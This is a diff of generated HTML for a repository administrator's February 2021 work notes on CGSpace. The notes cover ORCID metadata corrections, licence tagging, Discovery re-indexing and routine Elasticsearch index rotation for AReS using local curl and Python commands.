Stefan Burkart: 0000-0002-7558-9177,Stefan Burkart: 0000-0001-5297-2184
Adina Chain Guadarrama: 0000-0002-6944-2064,Adina Chain-Guadarrama: 0000-0002-6944-2064
Bedru: 0000-0002-7344-5743,Bedru B. Balana: 0000-0002-7344-5743
Leigh Winowiecki: 0000-0001-5572-1284,Leigh Ann Winowiecki: 0000-0001-5572-1284
Sander J. Zwart: 0000-0002-5091-1801,Sander Zwart: 0000-0002-5091-1801
saul lozano-fuentes: 0000-0003-1517-6853,Saul Lozano: 0000-0003-1517-6853
$ ./ilri/fix-metadata-values.py -i 2021-02-02-fix-orcid-ids.csv -db dspace63 -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f cg.creator.id -t <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#ae81ff">240</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat 2021-02-02-fix-orcid-ids.csv
</span></span><span style="display:flex;"><span>cg.creator.id,correct
</span></span><span style="display:flex;"><span>Burkart Stefan: 0000-0001-5297-2184,Stefan Burkart: 0000-0001-5297-2184
</span></span><span style="display:flex;"><span>Burkart Stefan: 0000-0002-7558-9177,Stefan Burkart: 0000-0001-5297-2184
</span></span><span style="display:flex;"><span>Stefan Burkart: 0000-0001-5297-2184,Stefan Burkart: 0000-0001-5297-2184
</span></span><span style="display:flex;"><span>Stefan Burkart: 0000-0002-7558-9177,Stefan Burkart: 0000-0001-5297-2184
</span></span><span style="display:flex;"><span>Adina Chain Guadarrama: 0000-0002-6944-2064,Adina Chain-Guadarrama: 0000-0002-6944-2064
</span></span><span style="display:flex;"><span>Bedru: 0000-0002-7344-5743,Bedru B. Balana: 0000-0002-7344-5743
</span></span><span style="display:flex;"><span>Leigh Winowiecki: 0000-0001-5572-1284,Leigh Ann Winowiecki: 0000-0001-5572-1284
</span></span><span style="display:flex;"><span>Sander J. Zwart: 0000-0002-5091-1801,Sander Zwart: 0000-0002-5091-1801
</span></span><span style="display:flex;"><span>saul lozano-fuentes: 0000-0003-1517-6853,Saul Lozano: 0000-0003-1517-6853
</span></span><span style="display:flex;"><span>$ ./ilri/fix-metadata-values.py -i 2021-02-02-fix-orcid-ids.csv -db dspace63 -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f cg.creator.id -t <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#ae81ff">240</span>
</span></span></code></pre></div><ul>
<li>I also looked up which of these new authors might have existing items that are missing ORCID iDs</li>
<li>I had to port my <code>add-orcid-identifiers-csv.py</code> to DSpace 6 UUIDs and I think it&rsquo;s working but I want to do a few more tests because it uses a sequence for the metadata_value_id</li>
</ul>
@ -263,23 +263,23 @@ $ ./ilri/fix-metadata-values.py -i 2021-02-02-fix-orcid-ids.csv -db dspace63 -u
<ul>
<li>Tag forty-three items from Bioversity&rsquo;s new authors with ORCID iDs using <code>add-orcid-identifiers-csv.py</code>:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat /tmp/2021-02-02-add-orcid-ids.csv
dc.contributor.author,cg.creator.id
&#34;Nchanji, E.&#34;,Eileen Bogweh Nchanji: 0000-0002-6859-0962
&#34;Nchanji, Eileen&#34;,Eileen Bogweh Nchanji: 0000-0002-6859-0962
&#34;Nchanji, Eileen Bogweh&#34;,Eileen Bogweh Nchanji: 0000-0002-6859-0962
&#34;Machida, Lewis&#34;,Lewis Machida: 0000-0002-0012-3997
&#34;Mockshell, Jonathan&#34;,Jonathan Mockshell: 0000-0003-1990-6657&#34;
&#34;Aubert, C.&#34;,Celine Aubert: 0000-0001-6284-4821
&#34;Aubert, Céline&#34;,Celine Aubert: 0000-0001-6284-4821
&#34;Devare, M.&#34;,Medha Devare: 0000-0003-0041-4812
&#34;Devare, Medha&#34;,Medha Devare: 0000-0003-0041-4812
&#34;Benites-Alfaro, O.E.&#34;,Omar E. Benites-Alfaro: 0000-0002-6852-9598
&#34;Benites-Alfaro, Omar Eduardo&#34;,Omar E. Benites-Alfaro: 0000-0002-6852-9598
&#34;Johnson, Vincent&#34;,VINCENT JOHNSON: 0000-0001-7874-178X
&#34;Lesueur, Didier&#34;,didier lesueur: 0000-0002-6694-0869
$ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2021-02-02-add-orcid-ids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -d
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat /tmp/2021-02-02-add-orcid-ids.csv
</span></span><span style="display:flex;"><span>dc.contributor.author,cg.creator.id
</span></span><span style="display:flex;"><span>&#34;Nchanji, E.&#34;,Eileen Bogweh Nchanji: 0000-0002-6859-0962
</span></span><span style="display:flex;"><span>&#34;Nchanji, Eileen&#34;,Eileen Bogweh Nchanji: 0000-0002-6859-0962
</span></span><span style="display:flex;"><span>&#34;Nchanji, Eileen Bogweh&#34;,Eileen Bogweh Nchanji: 0000-0002-6859-0962
</span></span><span style="display:flex;"><span>&#34;Machida, Lewis&#34;,Lewis Machida: 0000-0002-0012-3997
</span></span><span style="display:flex;"><span>&#34;Mockshell, Jonathan&#34;,Jonathan Mockshell: 0000-0003-1990-6657&#34;
</span></span><span style="display:flex;"><span>&#34;Aubert, C.&#34;,Celine Aubert: 0000-0001-6284-4821
</span></span><span style="display:flex;"><span>&#34;Aubert, Céline&#34;,Celine Aubert: 0000-0001-6284-4821
</span></span><span style="display:flex;"><span>&#34;Devare, M.&#34;,Medha Devare: 0000-0003-0041-4812
</span></span><span style="display:flex;"><span>&#34;Devare, Medha&#34;,Medha Devare: 0000-0003-0041-4812
</span></span><span style="display:flex;"><span>&#34;Benites-Alfaro, O.E.&#34;,Omar E. Benites-Alfaro: 0000-0002-6852-9598
</span></span><span style="display:flex;"><span>&#34;Benites-Alfaro, Omar Eduardo&#34;,Omar E. Benites-Alfaro: 0000-0002-6852-9598
</span></span><span style="display:flex;"><span>&#34;Johnson, Vincent&#34;,VINCENT JOHNSON: 0000-0001-7874-178X
</span></span><span style="display:flex;"><span>&#34;Lesueur, Didier&#34;,didier lesueur: 0000-0002-6694-0869
</span></span><span style="display:flex;"><span>$ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2021-02-02-add-orcid-ids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -d
</span></span></code></pre></div><ul>
<li>I&rsquo;m working on the CGSpace accession for Karl Rich&rsquo;s <a href="https://github.com/ilri/vietnam-pig-model-2018">Viet Nam Pig Model 2018</a> and I noticed his ORCID iD is missing from CGSpace
<ul>
<li>I added it and tagged 141 items of his with the iD</li>
@ -300,9 +300,9 @@ $ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2021-02-02-add-orcid-ids.csv -db d
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ time chrt -b <span style="color:#ae81ff">0</span> dspace index-discovery -b
$ dspace oai import -c
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ time chrt -b <span style="color:#ae81ff">0</span> dspace index-discovery -b
</span></span><span style="display:flex;"><span>$ dspace oai import -c
</span></span></code></pre></div><ul>
<li>Attend Accenture meeting for repository managers
<ul>
<li>Not clear what the SMO wants to get out of us</li>
@ -333,8 +333,8 @@ $ dspace oai import -c
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/delete-metadata-values.py -i /tmp/2020-10-28-Series-PB.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f dc.relation.ispartofseries -m <span style="color:#ae81ff">43</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/delete-metadata-values.py -i /tmp/2020-10-28-Series-PB.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f dc.relation.ispartofseries -m <span style="color:#ae81ff">43</span>
</span></span></code></pre></div><ul>
<li>The corrected versions have a lot of encoding issues so I asked Peter to give me the correct ones so I can search/replace them:
<ul>
<li>CIAT Publicaçao</li>
@ -358,8 +358,8 @@ $ dspace oai import -c
<li>I ended up using <a href="https://github.com/LuminosoInsight/python-ftfy">python-ftfy</a> to fix those very easily, then replaced them in the CSV</li>
<li>Then I trimmed whitespace at the beginning, end, and around the &ldquo;;&rdquo;, and applied the 1,600 fixes using <code>fix-metadata-values.py</code>:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/fix-metadata-values.py -i /tmp/2020-10-28-Series-PB.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f dc.relation.ispartofseries -t <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#ae81ff">43</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/fix-metadata-values.py -i /tmp/2020-10-28-Series-PB.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f dc.relation.ispartofseries -t <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#ae81ff">43</span>
</span></span></code></pre></div><ul>
<li>Help Peter debug an issue with one of Alan Duncan&rsquo;s new FEAST Data reports on CGSpace
<ul>
<li>For some reason the default policy for the item was &ldquo;COLLECTION_492_DEFAULT_READ&rdquo; group, which had zero members</li>
@ -372,12 +372,12 @@ $ dspace oai import -c
<li>Run system updates on CGSpace (linode18), deploy latest 6_x-prod branch, and reboot the server</li>
<li>After the server came back up I started a full Discovery re-indexing:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>real 247m30.850s
user 160m36.657s
sys 2m26.050s
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>real 247m30.850s
</span></span><span style="display:flex;"><span>user 160m36.657s
</span></span><span style="display:flex;"><span>sys 2m26.050s
</span></span></code></pre></div><ul>
<li>Regarding the CG Core v2 migration, Fabio wrote to tell me that he is not using CGSpace directly, instead harvesting via GARDIAN
<ul>
<li>He gave me the contact of Sotiris Konstantinidis, who is the CTO at SCIO Systems and works on the GARDIAN platform</li>
@ -385,30 +385,30 @@ sys 2m26.050s
</li>
<li>Delete the old Elasticsearch temp index to prepare for starting an AReS re-harvest:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
# start indexing in AReS
</code></pre></div><h2 id="2021-02-08">2021-02-08</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span><span style="display:flex;"><span># start indexing in AReS
</span></span></code></pre></div><h2 id="2021-02-08">2021-02-08</h2>
<ul>
<li>Finish rotating the AReS indexes after the harvesting last night:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 100983,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;:true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-08
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-02-08&#39;</span>
</code></pre></div><h2 id="2021-02-10">2021-02-10</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 100983,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;:true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-08
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-02-08&#39;</span>
</span></span></code></pre></div><h2 id="2021-02-10">2021-02-10</h2>
<ul>
<li>Talk to Abdullah from CodeObia about a few of the issues we filed on OpenRXV
<ul>
@ -429,22 +429,22 @@ $ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-i
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed <span style="color:#e6db74">&#39;1d&#39;</span> | wc -l
30354
$ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed <span style="color:#e6db74">&#39;1d&#39;</span> | sort -u | wc -l
18555
$ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed <span style="color:#e6db74">&#39;1d&#39;</span> | sort | uniq -c | sort -h | tail
5 c21a79e5-e24e-4861-aa07-e06703d1deb7
5 c2460aa1-ae28-4003-9a99-2d7c5cd7fd38
5 d73fb3ae-9fac-4f7e-990f-e394f344246c
5 dc0e24fa-b7f5-437e-ac09-e15c0704be00
5 dc50bcca-0abf-473f-8770-69d5ab95cc33
5 e714bdf9-cc0f-4d9a-a808-d572e25c9238
6 7dfd1c61-9e8c-4677-8d41-e1c4b11d867d
6 fb76888c-03ae-4d53-b27d-87d7ca91371a
6 ff42d1e6-c489-492c-a40a-803cabd901ed
7 094e9e1d-09ff-40ca-a6b9-eca580936147
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed <span style="color:#e6db74">&#39;1d&#39;</span> | wc -l
</span></span><span style="display:flex;"><span>30354
</span></span><span style="display:flex;"><span>$ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed <span style="color:#e6db74">&#39;1d&#39;</span> | sort -u | wc -l
</span></span><span style="display:flex;"><span>18555
</span></span><span style="display:flex;"><span>$ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed <span style="color:#e6db74">&#39;1d&#39;</span> | sort | uniq -c | sort -h | tail
</span></span><span style="display:flex;"><span> 5 c21a79e5-e24e-4861-aa07-e06703d1deb7
</span></span><span style="display:flex;"><span> 5 c2460aa1-ae28-4003-9a99-2d7c5cd7fd38
</span></span><span style="display:flex;"><span> 5 d73fb3ae-9fac-4f7e-990f-e394f344246c
</span></span><span style="display:flex;"><span> 5 dc0e24fa-b7f5-437e-ac09-e15c0704be00
</span></span><span style="display:flex;"><span> 5 dc50bcca-0abf-473f-8770-69d5ab95cc33
</span></span><span style="display:flex;"><span> 5 e714bdf9-cc0f-4d9a-a808-d572e25c9238
</span></span><span style="display:flex;"><span> 6 7dfd1c61-9e8c-4677-8d41-e1c4b11d867d
</span></span><span style="display:flex;"><span> 6 fb76888c-03ae-4d53-b27d-87d7ca91371a
</span></span><span style="display:flex;"><span> 6 ff42d1e6-c489-492c-a40a-803cabd901ed
</span></span><span style="display:flex;"><span> 7 094e9e1d-09ff-40ca-a6b9-eca580936147
</span></span></code></pre></div><ul>
<li>I added a comment to that bug to ask if this is a side effect of the patch</li>
<li>I started working on tagging pre-2010 ILRI items with license information, like we talked about with Peter and Abenet last week
<ul>
@ -452,23 +452,23 @@ $ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed <span style="color:#e6db74">&#39;1
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c <span style="color:#e6db74">&#39;id,dc.date.issued,dc.date.issued[],dc.date.issued[en_US],dc.rights,dc.rights[],dc.rights[en],dc.rights[en_US],dc.publisher,dc.publisher[],dc.publisher[en_US],dc.type[en_US]&#39;</span> /tmp/2021-02-10-ILRI.csv | csvgrep -c <span style="color:#e6db74">&#39;dc.type[en_US]&#39;</span> -r <span style="color:#e6db74">&#39;^.+[^(Journal Item|Journal Article|Book|Book Chapter)]&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;id,dc.date.issued,dc.date.issued[],dc.date.issued[en_US],dc.rights,dc.rights[],dc.rights[en],dc.rights[en_US],dc.publisher,dc.publisher[],dc.publisher[en_US],dc.type[en_US]&#39;</span> /tmp/2021-02-10-ILRI.csv | csvgrep -c <span style="color:#e6db74">&#39;dc.type[en_US]&#39;</span> -r <span style="color:#e6db74">&#39;^.+[^(Journal Item|Journal Article|Book|Book Chapter)]&#39;</span>
</span></span></code></pre></div><ul>
<li>I imported the CSV into OpenRefine and converted the date text values to date types so I could facet by dates before 2010:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">if(diff(value,&#34;01/01/2010&#34;.toDate(),&#34;days&#34;)&lt;0, true, false)
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>if(diff(value,&#34;01/01/2010&#34;.toDate(),&#34;days&#34;)&lt;0, true, false)
</span></span></code></pre></div><ul>
<li>Then I filtered by publisher to make sure they were only ours:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">or(
value.contains(&#34;International Livestock Research Institute&#34;),
value.contains(&#34;ILRI&#34;),
value.contains(&#34;International Livestock Centre for Africa&#34;),
value.contains(&#34;ILCA&#34;),
value.contains(&#34;ILRAD&#34;),
value.contains(&#34;International Laboratory for Research on Animal Diseases&#34;)
)
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>or(
</span></span><span style="display:flex;"><span> value.contains(&#34;International Livestock Research Institute&#34;),
</span></span><span style="display:flex;"><span> value.contains(&#34;ILRI&#34;),
</span></span><span style="display:flex;"><span> value.contains(&#34;International Livestock Centre for Africa&#34;),
</span></span><span style="display:flex;"><span> value.contains(&#34;ILCA&#34;),
</span></span><span style="display:flex;"><span> value.contains(&#34;ILRAD&#34;),
</span></span><span style="display:flex;"><span> value.contains(&#34;International Laboratory for Research on Animal Diseases&#34;)
</span></span><span style="display:flex;"><span>)
</span></span></code></pre></div><ul>
<li>I tagged these pre-2010 items with &ldquo;Other&rdquo; if they didn&rsquo;t already have a license</li>
<li>I checked 2010 to 2015, and 2016 to date, but they were all tagged already!</li>
<li>In the end I added the &ldquo;Other&rdquo; license to 1,523 items from before 2010</li>
@ -496,7 +496,7 @@ $ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed <span style="color:#e6db74">&#39;1
en | 7601
| 0
(4 rows)
dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item);
dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE dspace_object_id IN (SELECT uuid FROM item);
</code></pre><ul>
<li>Start a full Discovery re-indexing on CGSpace</li>
</ul>
@ -504,8 +504,8 @@ dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (S
<ul>
<li>Clear the OpenRXV temp items index:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span></code></pre></div><ul>
<li>Then start a full harvesting of CGSpace in the AReS Explorer admin dashboard</li>
<li>Peter asked me about a few other recently submitted FEAST items that are restricted
<ul>
@ -521,35 +521,35 @@ dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (S
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/move-metadata-values.py -i /tmp/move.txt -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f <span style="color:#ae81ff">43</span> -t <span style="color:#ae81ff">55</span>
</code></pre></div><h2 id="2021-02-15">2021-02-15</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/move-metadata-values.py -i /tmp/move.txt -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f <span style="color:#ae81ff">43</span> -t <span style="color:#ae81ff">55</span>
</span></span></code></pre></div><h2 id="2021-02-15">2021-02-15</h2>
<ul>
<li>Check the results of the AReS Harvesting from last night:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 101126,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 101126,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><ul>
<li>Set the current items index to read only and make a backup:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39; {&#34;settings&#34;: {&#34;index.blocks.write&#34;:true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-15
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39; {&#34;settings&#34;: {&#34;index.blocks.write&#34;:true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-15
</span></span></code></pre></div><ul>
<li>Delete the current items index and clone the temp one:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-02-15&#39;</span>
</code></pre></div><ul>
